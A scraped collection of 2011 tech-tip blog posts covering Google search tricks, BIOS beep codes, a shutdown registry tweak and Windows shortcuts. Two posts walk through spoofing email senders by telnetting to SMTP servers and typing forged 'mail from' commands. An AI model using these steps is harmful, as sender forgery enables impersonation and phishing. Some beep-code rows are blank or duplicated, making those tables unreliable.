  2025. Let Google help you figure out whether you've got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try "thre blund mise") and Google may suggest a proper spelling. This doesn't always succeed; it works best when the word you're searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you're searching for "three blind mice," underneath the search window will appear a statement such as Searched the web for "three blind mice.") You'll discover that you can click on each word in your search phrase and get a definition from a dictionary.
  2026.  
  2027. Suppose you want to contact someone and don't have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you'll see it at the top of the search results along with a map link to the address. If you'd rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you'd rather use a search form for business phone listings, try Yellow Search
  2028.  
  2029. (www.buzztoolbox.com/google/yellowsearch.shtml).
  2030.  
  2031.  
  2032.  
  2033.  
  2034. Extended Googling
  2035.  
  2036. Google offers several services that give you a head start in focusing your search. Google Groups
  2037.  
  2038. (http://groups.google.com)
  2039.  
  2040. indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: Froogle
  2041. CODE
  2042. (http://froogle.google.com),
  2043.  
  2044. which indexes products from online stores, and Google Catalogs
  2045. CODE
  2046. (http://catalogs.google.com),
  2047.  
  2048. which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google's tools and services at
  2049.  
  2050. www.google.com/options/index.html
  2051.  
  2052. You're probably used to using Google in your browser. But have you ever thought of using Google outside your browser?
  2053.  
  2054. Google Alert
  2055.  
  2056. (www.googlealert.com)
  2057.  
  2058. monitors your search terms and e-mails you information about new additions to Google's Web index. (Google Alert is not affiliated with Google; it uses Google's Web services API to perform its searches.) If you're more interested in news stories than general Web content, check out the beta version of Google News Alerts
  2059.  
  2060. (www.google.com/newsalerts).
  2061.  
  2062. This service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)
  2063.  
  2064. Google on the telephone? Yup. This service is brought to you by the folks at Google Labs
  2065.  
  2066. (http://labs.google.com),
  2067.  
  2068. a place for experimental Google ideas and features (which may come and go, so what's there at this writing might not be there when you decide to check it out). With Google Voice Search
  2069.  
  2070. (http://labs1.google.com/gvs.html),
  2071.  
  2072. you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don't expect 100 percent success.
  2073.  
  2074. In 2002, Google released the Google API (application programming interface), a way for programmers to access Google's search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you'll need an API key, which is available free from
  2075. CODE
  2076. www.google.com/apis
  2077.  
  2078. . See the figures for two more examples, and visit
  2079.  
  2080. www.pcmag.com/solutions
  2081.  
  2082. for more.
  2083.  
  2084. Thanks to its many different search properties, Google goes far beyond a regular search engine. Give the tricks in this article a try. You'll be amazed at how many different ways Google can improve your Internet searching.
  2085.  
  2086.  
  2087. Online Extra: More Google Tips
  2088.  
  2089.  
  2090. Here are a few more clever ways to tweak your Google searches.
  2091.  
  2092. Search Within a Timeframe
  2093.  
  2094. Daterange: (start date–end date). You can restrict your searches to pages that were indexed within a certain time period. Daterange: searches by when Google indexed a page, not when the page itself was created. This operator can help you ensure that results will have fresh content (by using recent dates), or you can use it to avoid a topic's current-news blizzard and concentrate only on older results. Daterange: is actually more useful if you go elsewhere to take advantage of it, because daterange: requires Julian dates, not standard Gregorian dates. You can find converters on the Web (such as
  2095.  
  2096. CODE
  2097. http://aa.usno.navy.mil/data/docs/JulianDate.html
  2098.  
  2099. excl.gif No Active Links, Read the Rules - Edit by Ninja excl.gif
  2100.  
  2101.  
  2102. ), but an easier way is to do a Google daterange: search by filling in a form at
  2103.  
  2104. www.researchbuzz.com/toolbox/goofresh.shtml or www.faganfinder.com/engines/google.shtml
  2105.  
  2106. . If one special syntax element is good, two must be better, right? Sometimes. Though some operators can't be mixed (you can't use the link: operator with anything else) many can be, quickly narrowing your results to a less overwhelming number.
  2107.  
  2108. More Google API Applications
  2109.  
  2110. Staggernation.com offers three tools based on the Google API. The Google API Web Search by Host (GAWSH) lists the Web hosts of the results for a given query
  2111.  
  2112. (www.staggernation.com/gawsh/).
  2113.  
  2114. When you click on the triangle next to each host, you get a list of results for that host. The Google API Relation Browsing Outliner (GARBO) is a little more complicated: You enter a URL and choose whether you want pages that related to the URL or linked to the URL
  2115.  
  2116. (www.staggernation.com/garbo/).
  2117.  
  2118. Click on the triangle next to an URL to get a list of pages linked or related to that particular URL. CapeMail is an e-mail search application that allows you to send an e-mail to google@capeclear.com with the text of your query in the subject line and get the first ten results for that query back. Maybe it's not something you'd do every day, but if your cell phone does e-mail and doesn't do Web browsing, this is a very handy address to know.
  2119. original from : http://www.the-cybers-skills.blogspot.com
  2120. Email Forge, sends email from anyone
  2121. Saturday, September 17, 2011 2:31 AM
  2122. 1. Some ISP's block port 25 so it might not work
  2123. 2. Most likely, you won't be able to see what yer typing
  2124.  
  2125. First of all, you need an SMTP server. These are extremely common and, in fact, I'll provide one for you (mail.hotmail.com). SMTP: Simple Mail Transfer Protocol. This service runs on port 25 (in most cases) and is used to send outgoing email.
  2126.  
  2127. Now, open up the command prompt and telnet to mail.hotmail.com on port 25 (note: to see what you type, type telnet and enter then type in set local_echo):
  2128.  
  2129.  
  2130.  
  2131. code:--------------------------------------------------------------------------------
  2132. telnet mail.hotmail.com 25
  2133. --------------------------------------------------------------------------------
  2134.  
  2135.  
  2136. When yer connected type in (except what's in between *'s; you chose what will go in the []):
  2137.  
  2138. code:--------------------------------------------------------------------------------
  2139. helo
  2140. *wait*
  2141. mail from:[whoever]@[whoever.com]
  2142. *wait*
  2143. rcpt to:[whoever]@[whoever.com]
  2144. *wait*
  2145. data
  2146. *wait*
  2147. [write]
  2148. [whatever you want]
  2149. [in]
  2150. [as many]
  2151. [lines as wished]
  2152. .
  2153. *wait*
  2154. quit
  2155. --------------------------------------------------------------------------------
  2156.  
  2157.  
  2158. Helo is just a handshake with the server. Mail from: is FROM who you want the email to be. rcpt to: is who you want the email to go to. under data is what you want sent. the '.' ends data. quit quits. There! simple isn't it.
  2159. original from : http://www.the-cybers-skills.blogspot.com
  2160. ANONYMOUS e-mails to someone without a program
  2161. Saturday, September 17, 2011 2:31 AM
  2162. Welcome to Hackerdevil's guide on how to send ANONYMOUS e-mails to someone without a prog.
  2163.  
  2164.  I am Hackerdevil and i am going to explain ya a way to send home-made e-mails. I mean its a way to send Annonimous e-mails without a program, it doesn't take
  2165. to much time and its cool and you can have more knowledge than with a stupid program that does all by itself.
  2166.  
  2167. This way (to hackers) is old what as you are newby to this stuff, perhaps you may like to know how these anonymailers work, (home-made)
  2168.  
  2169. Well.....
  2170. Go to Start, then Run...
  2171. You have to Telnet (Xserver) on port 25
  2172.  
  2173. Well, (In this Xserver) you have to put the name of a server without the ( ) of course...
  2174. Put in iname.com in (Xserver) because it always work it is a server with many bugs in it.
  2175. (25) mail port.
  2176.  
  2177. So now we are like this.
  2178.  
  2179. telnet iname.com 25
  2180.  
  2181. and then you hit enter
  2182. Then When you have telnet open put the following like it is written
  2183.  
  2184. helo
  2185.  
  2186. and the machine will reply with smth.
  2187.  
  2188. Notice for newbies: If you do not see what you are writing go to Terminal's menu (in telnet) then to Preferences and in the Terminal Options you tick all opctions available and in the emulation menu that's the following one you have to tick the second option.
  2189. Now you will se what you are writing.
  2190.  
  2191. then you put:
  2192.  
  2193. mail from: and so on...
  2194. If you make an error start all over again
  2195.  
  2196. Example:
  2197. mail from:
  2198.  
  2199. You hit enter and then you put:
  2200.  
  2201. rcpt to:
  2202. This one has to be an existance address as you are mailing anonymously to him.
  2203.  
  2204. Then you hit enter
  2205. And you type
  2206. Data
  2207. and hit enter once more
  2208.  
  2209. Then you write
  2210.  
  2211. Subject:whetever
  2212.  
  2213. And you hit enter
  2214.  
  2215. you write your mail
  2216.  
  2217. hit enter again (boring)
  2218.  
  2219. you put a simple:
  2220. .
  2221.  
  2222. Yes you don't see it its the little fucking point!
  2223. and hit enter
  2224. Finally you write
  2225. quit
  2226. hit enter one more time
  2227. and it's done
  2228.  
  2229. look:Try first do it with yourself I mean mail annonymously yourself so you can test it!
  2230. Don't be asshole and write fucking e-mails to big corps. bec' its symbol of stupidity and childhood and it has very very effect on Hackers they will treat you as a Lamer!
  2231.  
  2232. Really i don't know why i wrote this fucking disclaimer, but i don't want to feel guilty if you get into trouble....
  2233.  
  2234. Disclamer:Hackerdevil is not responsable for whetever you do with this info. you can destribute this but you are totally forbidden to take out the "By Hackerdevil" line. You can't modify or customize this text and i am also not responsable if you send an e-mail to an important guy and insult him, and i rectly advise you that this is  for educational porpouses only my idea is for learning and having more knowledge, you can not get busted with this stuff but i don't take care if it anyway happen to you.  If this method is new for ya probably you aren't a hacker so think that if someone wrote you an e-mail "yourbestfirend@aol.com"  insulting you and it wasn't him it but was some guy using a program or this info you won't like it.so Use this method if you don't care a a damn hell or if you like that someone insult you.
  2235.  
  2236.  
  2237. By Hackerdevil
  2238.  
  2239. hackerdevil@iname.com
  2240. www.angelfire.com/ar/HDanzi/index.html
  2241. original from : http://www.the-cybers-skills.blogspot.com
  2242. Auto End Tasks to Enable a Proper Shutdown
  2243. Saturday, September 17, 2011 2:31 AM
  2244. This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.
  2245.  
  2246. 1. Copy the following (everything in the box) into notepad.
  2247.  
  2248.  
  2249. QUOTE
  2250. Windows Registry Editor Version 5.00
  2251.  
  2252. [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
  2253. "ClearPageFileAtShutdown"=dword:00000001
  2254.  
  2255. [HKEY_USERS\.DEFAULT\Control Panel\Desktop]
  2256. "AutoEndTasks"="1"
  2257.  
  2258. [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
  2259. "WaitToKillServiceTimeout"="1000"
  2260.  
  2261.  
  2262. 2. Save the file as shutdown.reg
  2263. 3. Double click the file to import into your registry.
  2264.  
  2265. NOTE: If your anti-virus software warns you of a "malicious" script, this is normal if you have "Script Safe" or similar technology enabled.
  2266. original from : http://www.the-cybers-skills.blogspot.com
  2267. Beep Code Manual
  2268. Saturday, September 17, 2011 2:31 AM
  2269. Beep Code Manual, Better Than Gold Techies, American Megatrends Int. & Phoenix
  2270.  
  2271. (I'm IT, I use these codes to trouble shoot hardware issues at my job. Enjoy) cold.gif
  2272.  
  2273. BIOS Beep Codes
  2274.  
  2275. When a computer is first turned on, or rebooted, its BIOS performs a power-on self test (POST) to test the system's hardware, checking to make sure that all of the system's hardware components are working properly. Under normal circumstances, the POST will display an error message; however, if the BIOS detects an error before it can access the video card, or if there is a problem with the video card, it will produce a series of beeps, and the pattern of the beeps indicates what kind of problem the BIOS has detected.
  2276. Because there are many brands of BIOS, there are no standard beep codes for every BIOS.
  2277.  
  2278. The two most-used brands are AMI (American Megatrends International) and Phoenix.
  2279.  
  2280. Below are listed the beep codes for AMI systems, and here are the beep codes for Phoenix systems.
  2281.  
  2282.  
  2283. AMI Beep Codes
  2284.  
  2285. Beep Code Meaning
  2286. 1 beep DRAM refresh failure. There is a problem in the system memory or the motherboard.
  2287. 2 beeps Memory parity error. The parity circuit is not working properly.
  2288. 3 beeps Base 64K RAM failure. There is a problem with the first 64K of system memory.
  2289. 4 beeps System timer not operational. There is problem with the timer(s) that control functions on the motherboard.
  2290. 5 beeps Processor failure. The system CPU has failed.
  2291. 6 beeps Gate A20/keyboard controller failure. The keyboard IC controller has failed, preventing gate A20 from switching the processor to protect mode.
  2292. 7 beeps Virtual mode exception error.
  2293. 8 beeps Video memory error. The BIOS cannot write to the frame buffer memory on the video card.
  2294. 9 beeps ROM checksum error. The BIOS ROM chip on the motherboard is likely faulty.
  2295. 10 beeps CMOS checksum error. Something on the motherboard is causing an error when trying to interact with the CMOS.
  2296. 11 beeps Bad cache memory. An error in the level 2 cache memory.
  2297. 1 long beep, 2 short Failure in the video system.
  2298. 1 long beep, 3 short A failure has been detected in memory above 64K.
  2299. 1 long beep, 8 short Display test failure.
  2300. Continuous beeping A problem with the memory or video.
  2301. BIOS Beep Codes
  2302.  
  2303.  
  2304. Phoenix Beep Codes
  2305.  
  2306. Phoenix uses sequences of beeps to indicate problems. The "-" between each number below indicates a pause between each beep sequence. For example, 1-2-3 indicates one beep, followed by a pause and two beeps, followed by a pause and three beeps. Phoenix version before 4.x use 3-beep codes, while Phoenix versions starting with 4.x use 4-beep codes. Click here for AMI BIOS beep codes.
  2307. 4-Beep Codes
  2308. Beep Code Meaning
  2309. 1-1-1-3 Faulty CPU/motherboard. Verify real mode.
  2310. 1-1-2-1 Faulty CPU/motherboard.
  2311. 1-1-2-3 Faulty motherboard or one of its components.
  2312. 1-1-3-1 Faulty motherboard or one of its components. Initialize chipset registers with initial POST values.
  2313. 1-1-3-2 Faulty motherboard or one of its components.
  2314. 1-1-3-3 Faulty motherboard or one of its components. Initialize CPU registers.
  2315. 1-1-3-2
  2316. 1-1-3-3
  2317. 1-1-3-4 Failure in the first 64K of memory.
  2318. 1-1-4-1 Level 2 cache error.
  2319. 1-1-4-3 I/O port error.
  2320. 1-2-1-1 Power management error.
  2321. 1-2-1-2
  2322. 1-2-1-3 Faulty motherboard or one of its components.
  2323. 1-2-2-1 Keyboard controller failure.
  2324. 1-2-2-3 BIOS ROM error.
  2325. 1-2-3-1 System timer error.
  2326. 1-2-3-3 DMA error.
  2327. 1-2-4-1 IRQ controller error.
  2328. 1-3-1-1 DRAM refresh error.
  2329. 1-3-1-3 A20 gate failure.
  2330. 1-3-2-1 Faulty motherboard or one of its components.
  2331. 1-3-3-1 Extended memory error.
  2332. 1-3-3-3
  2333. 1-3-4-1
  2334. 1-3-4-3 Error in first 1MB of system memory.
  2335. 1-4-1-3
  2336. 1-4-2-4 CPU error.
  2337. 1-4-3-1
  2338. 2-1-4-1 BIOS ROM shadow error.
  2339. 1-4-3-2
  2340. 1-4-3-3 Level 2 cache error.
  2341. 1-4-4-1
  2342. 1-4-4-2
  2343. 2-1-1-1 Faulty motherboard or one of its components.
  2344. 2-1-1-3
  2345. 2-1-2-1 IRQ failure.
  2346. 2-1-2-3 BIOS ROM error.
  2347. 2-1-2-4
  2348. 2-1-3-2 I/O port failure.
  2349. 2-1-3-1
  2350. 2-1-3-3 Video system failure.
  2351. 2-1-1-3
  2352. 2-1-2-1 IRQ failure.
  2353. 2-1-2-3 BIOS ROM error.
  2354. 2-1-2-4 I/O port failure.
  2355. 2-1-4-3
  2356. 2-2-1-1 Video card failure.
  2357. 2-2-1-3
  2358. 2-2-2-1
  2359. 2-2-2-3 Keyboard controller failure.
  2360. 2-2-3-1 IRQ error.
  2361. 2-2-4-1 Error in first 1MB of system memory.
  2362. 2-3-1-1
  2363. 2-3-3-3 Extended memory failure.
  2364. 2-3-2-1 Faulty motherboard or one of its components.
  2365. 2-3-2-3
  2366. 2-3-3-1 Level 2 cache error.
  2367. 2-3-4-1
  2368. 2-3-4-3 Motherboard or video card failure.
  2369. 2-3-4-1
  2370. 2-3-4-3
  2371. 2-4-1-1 Motherboard or video card failure.
  2372. 2-4-1-3 Faulty motherboard or one of its components.
  2373. 2-4-2-1 RTC error.
  2374. 2-4-2-3 Keyboard controller error.
  2375. 2-4-4-1 IRQ error.
  2376. 3-1-1-1
  2377. 3-1-1-3
  2378. 3-1-2-1
  2379. 3-1-2-3 I/O port error.
  2380. 3-1-3-1
  2381. 3-1-3-3 Faulty motherboard or one of its components.
  2382. 3-1-4-1
  2383. 3-2-1-1
  2384. 3-2-1-2 Floppy drive or hard drive failure.
  2385. 3-2-1-3 Faulty motherboard or one of its components.
  2386. 3-2-2-1 Keyboard controller error.
  2387. 3-2-2-3
  2388. 3-2-3-1
  2389. 3-2-4-1 Faulty motherboard or one of its components.
  2390. 3-2-4-3 IRQ error.
  2391. 3-3-1-1 RTC error.
  2392. 3-3-1-3 Key lock error.
  2393. 3-3-3-3 Faulty motherboard or one of its components.
  2394. 3-3-3-3
  2395. 3-3-4-1
  2396. 3-3-4-3
  2397. 3-4-1-1
  2398. 3-4-1-3
  2399. 3-4-2-1
  2400. 3-4-2-3
  2401. 3-4-3-1
  2402. 3-4-4-1
  2403. 3-4-4-4 Faulty motherboard or one of its components.
  2404. 4-1-1-1 Floppy drive or hard drive failure.
  2405. 4-2-1-1
  2406. 4-2-1-3
  2407. 4-2-2-1 IRQ failure.
  2408. 4-2-2-3
  2409. 4-2-3-1
  2410. 4-2-3-3
  2411. 4-2-4-1 Faulty motherboard or one of its components.
  2412. 4-2-4-3 Keyboard controller error.
  2413. 4-3-1-3
  2414. 4-3-1-4
  2415. 4-3-2-1
  2416. 4-3-2-2
  2417. 4-3-3-1
  2418. 4-3-4-1
  2419. 4-3-4-3 Faulty motherboard or one of its components.
  2420. 4-3-3-2
  2421. 4-3-3-4 IRQ failure.
  2422. 4-3-3-3
  2423. 4-3-4-2 Floppy drive or hard drive failure.
  2424. 3-Beep Codes
  2425. Beep Code Meaning
  2426. 1-1-2 Faulty CPU/motherboard.
  2427. 1-1-3 Faulty motherboard/CMOS read-write failure.
  2428. 1-1-4 Faulty BIOS/BIOS ROM checksum error.
  2429. 1-2-1 System timer not operational. There is a problem with the timer(s) that control functions on the motherboard.
  2430. 1-2-2
  2431. 1-2-3 Faulty motherboard/DMA failure.
  2432. 1-3-1 Memory refresh failure.
  2433. 1-3-2
  2434. 1-3-3
  2435. 1-3-4 Failure in the first 64K of memory.
  2436. 1-4-1 Address line failure.
  2437. 1-4-2 Parity RAM failure.
  2438. 1-4-3 Timer failure.
  2439. 1-4-4 NMI port failure.
  2440. 2-_-_ Any combination of beeps after 2 indicates a failure in the first 64K of memory.
  2441. 3-1-1 Master DMA failure.
  2442. 3-1-2 Slave DMA failure.
  2443. 3-1-3
  2444. 3-1-4 Interrupt controller failure.
  2445. 3-2-4 Keyboard controller failure.
  2446. 3-3-1
  2447. 3-3-2 CMOS error.
  2448. 3-3-4 Video card failure.
  2449. 3-4-1 Video card failure.
  2450. 4-2-1 Timer failure.
  2451. 4-2-2 CMOS shutdown failure.
  2452. 4-2-3 Gate A20 failure.
  2453. 4-2-4 Unexpected interrupt in protected mode.
  2454. 4-3-1 RAM test failure.
  2455. 4-3-3 Timer failure.
  2456. 4-3-4 Time of day clock failure.
  2457. 4-4-1 Serial port failure.
  2458. 4-4-2 Parallel port failure.
  2459. 4-4-3 Math coprocessor.
  2460. original from : http://www.the-cybers-skills.blogspot.com
  2461. Beep Codes Error Codes
  2462. Saturday, September 17, 2011 2:31 AM
  2463. After repeated requests for beep codes i have decided to post them here maybe they could be pinned
  2464.  
  2465. Standard Original IBM POST Error Codes
  2466. Code Description
  2467.  
  2468. 1 short beep System is OK
  2469. 2 short beeps POST Error - error code shown on screen No beep Power supply or system board problem Continuous beep Power supply, system board, or keyboard problem Repeating short beeps Power supply or system board problem
  2470. 1 long, 1 short beep System board problem
  2471. 1 long, 2 short beeps Display adapter problem (MDA, CGA)
  2472. 1 long, 3 short beeps Display adapter problem (EGA)
  2473. 3 long beeps 3270 keyboard card
  2474. IBM POST Diagnostic Code Descriptions
  2475. Code Description
  2476. 100 - 199 System Board
  2477. 200 - 299 Memory
  2478. 300 - 399 Keyboard
  2479. 400 - 499 Monochrome Display
  2480. 500 - 599 Colour/Graphics Display
  2481. 600 - 699 Floppy-disk drive and/or Adapter
  2482. 700 - 799 Math Coprocessor
  2483. 900 - 999 Parallel Printer Port
  2484. 1000 - 1099 Alternate Printer Adapter
  2485. 1100 - 1299 Asynchronous Communication Device, Adapter, or Port
  2486. 1300 - 1399 Game Port
  2487. 1400 - 1499 Colour/Graphics Printer
  2488. 1500 - 1599 Synchronous Communication Device, Adapter, or Port
  2489. 1700 - 1799 Hard Drive and/or Adapter
  2490. 1800 - 1899 Expansion Unit (XT)
  2491. 2000 - 2199 Bisynchronous Communication Adapter
  2492. 2400 - 2599 EGA system-board Video (MCA)
  2493. 3000 - 3199 LAN Adapter
  2494. 4800 - 4999 Internal Modem
  2495. 7000 - 7099 Phoenix BIOS Chips
  2496. 7300 - 7399 3.5" Disk Drive
  2497. 8900 - 8999 MIDI Adapter
  2498. 11200 - 11299 SCSI Adapter
  2499. 21000 - 21099 SCSI Fixed Disk and Controller
  2500. 21500 - 21599 SCSI CD-ROM System
  2501.  
  2502. AMI BIOS Beep Codes
  2503. Code Description
  2504.  
  2505. 1 Short Beep System OK
  2506. 2 Short Beeps Parity error in the first 64 KB of memory
  2507. 3 Short Beeps Memory failure in the first 64 KB
  2508. 4 Short Beeps Memory failure in the first 64 KB Operational of memory
  2509. or Timer 1 on the motherboard is not functioning
  2510. 5 Short Beeps The CPU on the motherboard generated an error
  2511. 6 Short Beeps The keyboard controller may be bad. The BIOS cannot switch to protected mode
  2512. 7 Short Beeps The CPU generated an exception interrupt
  2513. 8 Short Beeps The system video adapter is either missing, or its memory is faulty
  2514. 9 Short Beeps The ROM checksum value does not match the value encoded in the BIOS
  2515. 10 Short Beeps The shutdown register for CMOS RAM failed
  2516. 11 Short Beeps The external cache is faulty
  2517. 1 Long, 3 Short Beeps Memory Problems
  2518. 1 Long, 8 Short Beeps Video Card Problems
  2519.  
  2520. Phoenix BIOS Beep Codes
  2521. Note - Phoenix BIOS emits three sets of beeps, separated by a brief pause.
  2522.  
  2523. Code Description
  2524. 1-1-3 CMOS read/write failure
  2525. 1-1-4 ROM BIOS checksum error
  2526. 1-2-1 Programmable interval timer failure
  2527. 1-2-2 DMA initialisation failure
  2528. 1-2-3 DMA page register read/write failure
  2529. 1-3-1 RAM refresh verification failure
  2530. 1-3-3 First 64k RAM chip or data line failure
  2531. 1-3-4 First 64k RAM odd/even logic failure
  2532. 1-4-1 Address line failure first 64k RAM
  2533. 1-4-2 Parity failure first 64k RAM
  2534. 2-_-_ Faulty Memory
  2535. 3-1-_ Faulty Motherboard
  2536. 3-2-4 Keyboard controller Test failure
  2537. 3-3-4 Screen initialisation failure
  2538. 3-4-1 Screen retrace test failure
  2539. 3-4-2 Search for video ROM in progress
  2540. 4-2-1 Timer tick interrupt in progress or failure
  2541. 4-2-2 Shutdown test in progress or failure
  2542. 4-2-3 Gate A20 failure
  2543. 4-2-4 Unexpected interrupt in protected mode
  2544. 4-3-1 RAM test in progress or failure>ffffh
  2545. 4-3-2 Faulty Motherboard
  2546. 4-3-3 Interval timer channel 2 test or failure
  2547. 4-3-4 Time of Day clock test failure
  2548. 4-4-1 Serial port test or failure
  2549. 4-4-2 Parallel port test or failure
  2550. 4-4-3 Math coprocessor test or failure
  2551. Low 1-1-2 System Board select failure
  2552. Low 1-1-3 Extended CMOS RAM failure
  2553. original from : http://www.the-cybers-skills.blogspot.com
  2554. Best Keyboard Shortcuts
  2555. Saturday, September 17, 2011 2:31 AM
  2556. Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:
  2557.  
  2558. Windows key + R = Run menu
  2559.  
  2560. This is usually followed by:
  2561. cmd = Command Prompt
  2562. iexplore + "web address" = Internet Explorer
  2563. compmgmt.msc = Computer Management
  2564. dhcpmgmt.msc = DHCP Management
  2565. dnsmgmt.msc = DNS Management
  2566. services.msc = Services
  2567. eventvwr = Event Viewer
  2568. dsa.msc = Active Directory Users and Computers
  2569. dssite.msc = Active Directory Sites and Services
  2570. Windows key + E = Explorer
  2571.  
  2572. ALT + Tab = Switch between windows
  2573.  
  2574. ALT, Space, X = Maximize window
  2575.  
  2576. CTRL + Shift + Esc = Task Manager
  2577.  
  2578. Windows key + Break = System properties
  2579.  
  2580. Windows key + F = Search
  2581.  
  2582. Windows key + D = Hide/Display all windows
  2583.  
  2584. CTRL + C = copy
  2585.  
  2586. CTRL + X = cut
  2587.  
  2588. CTRL + V = paste
  2589.  
  2590. Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.
  2591.  
  2592.  
  2593. Keyboard Shortcuts
  2594.  
  2595. [Alt] and [Esc] Switch between running applications
  2596.  
  2597. [Alt] and letter Select menu item by underlined letter
  2598.  
  2599. [Ctrl] and [Esc] Open Program Menu
  2600.  
  2601. [Ctrl] and [F4] Close active document or group windows (does not work with some applications)
  2602.  
  2603. [Alt] and [F4] Quit active application or close current window
  2604.  
  2605. [Alt] and [-] Open Control menu for active document
  2606.  
  2607. Ctrl] Lft., Rt. arrow Move cursor forward or back one word
  2608.  
  2609. Ctrl] Up, Down arrow Move cursor forward or back one paragraph
  2610.  
  2611. [F1] Open Help for active application
  2612.  
  2613. Windows+M Minimize all open windows
  2614.  
  2615. Shift+Windows+M Undo minimize all open windows
  2616.  
  2617. Windows+F1 Open Windows Help
  2618.  
  2619. Windows+Tab Cycle through the Taskbar buttons
  2620.  
  2621. Windows+Break Open the System Properties dialog box
  2622.  
  2623.  
  2624.  
  2625. acessability shortcuts
  2626.  
  2627. Right SHIFT for eight seconds........ Switch FilterKeys on and off.
  2628.  
  2629. Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.
  2630.  
  2631. Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.
  2632.  
  2633. SHIFT....... five times Switch StickyKeys on and off.
  2634.  
  2635. NUM LOCK...... for five seconds Switch ToggleKeys on and off.
  2636.  
  2637. explorer shortcuts
  2638.  
  2639. END....... Display the bottom of the active window.
  2640.  
  2641. HOME....... Display the top of the active window.
  2642.  
  2643. NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.
  2644.  
  2645. NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.
  2646.  
  2647. NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.
  2648.  
  2649. LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.
  2650.  
  2651. RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.
  2652.  
  2653.  
  2654.  
  2655.  
  2656. Type the following commands in your Run Box (Windows Key + R) or Start Run
  2657.  
  2658. devmgmt.msc = Device Manager
  2659. msinfo32 = System Information
  2660. cleanmgr = Disk Cleanup
  2661. ntbackup = Backup or Restore Wizard (Windows Backup Utility)
  2662. mmc = Microsoft Management Console
  2663. excel = Microsoft Excel (If Installed)
  2664. msaccess = Microsoft Access (If Installed)
  2665. powerpnt = Microsoft PowerPoint (If Installed)
  2666. winword = Microsoft Word (If Installed)
  2667. frontpg = Microsoft FrontPage (If Installed)
  2668. notepad = Notepad
  2669. wordpad = WordPad
  2670. calc = Calculator
  2671. msmsgs = Windows Messenger
  2672. mspaint = Microsoft Paint
  2673. wmplayer = Windows Media Player
  2674. rstrui = System Restore
  2675. netscp6 = Netscape 6.x
  2676. netscp = Netscape 7.x
  2677. netscape = Netscape 4.x
  2678. waol = America Online
  2679. control = Opens the Control Panel
  2680. control printers = Opens the Printers Dialog
  2681.  
  2682.  
  2683. internetbrowser
  2684.  
  2685. type in u're adress "google", then press [Right CTRL] and [Enter]
  2686. add www. and .com to word and go to it
  2687.  
  2688.  
  2689. For Windows XP:
  2690.  
  2691. Copy. CTRL+C
  2692. Cut. CTRL+X
  2693. Paste. CTRL+V
  2694. Undo. CTRL+Z
  2695. Delete. DELETE
  2696. Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
  2697. Copy selected item. CTRL while dragging an item
  2698. Create shortcut to selected item. CTRL+SHIFT while dragging an item
  2699. Rename selected item. F2
  2700. Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
  2701. Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
  2702. Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
  2703. Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
  2704. Highlight a block of text. CTRL+SHIFT with any of the arrow keys
  2705. Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
  2706. Select all. CTRL+A
  2707. Search for a file or folder. F3
  2708. View properties for the selected item. ALT+ENTER
  2709. Close the active item, or quit the active program. ALT+F4
  2710. Opens the shortcut menu for the active window. ALT+SPACEBAR
  2711. Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
  2712. Switch between open items. ALT+TAB
  2713. Cycle through items in the order they were opened. ALT+ESC
  2714. Cycle through screen elements in a window or on the desktop. F6
  2715. Display the Address bar list in My Computer or Windows Explorer. F4
  2716. Display the shortcut menu for the selected item. SHIFT+F10
  2717. Display the System menu for the active window. ALT+SPACEBAR
  2718. Display the Start menu. CTRL+ESC
  2719. Display the corresponding menu. ALT+Underlined letter in a menu name
  2720. Carry out the corresponding command. Underlined letter in a command name on an open menu
  2721. Activate the menu bar in the active program. F10
  2722. Open the next menu to the right, or open a submenu. RIGHT ARROW
  2723. Open the next menu to the left, or close a submenu. LEFT ARROW
  2724. Refresh the active window. F5
  2725. View the folder one level up in My Computer or Windows Explorer. BACKSPACE
  2726. Cancel the current task. ESC
  2727. SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.
  2728.  
  2729. Use these keyboard shortcuts for dialog boxes:
  2730.  
  2731. To Press
  2732. Move forward through tabs. CTRL+TAB
  2733. Move backward through tabs. CTRL+SHIFT+TAB
  2734. Move forward through options. TAB
  2735. Move backward through options. SHIFT+TAB
  2736. Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
  2737. Carry out the command for the active option or button. ENTER
  2738. Select or clear the check box if the active option is a check box. SPACEBAR
  2739. Select a button if the active option is a group of option buttons. Arrow keys
  2740. Display Help. F1
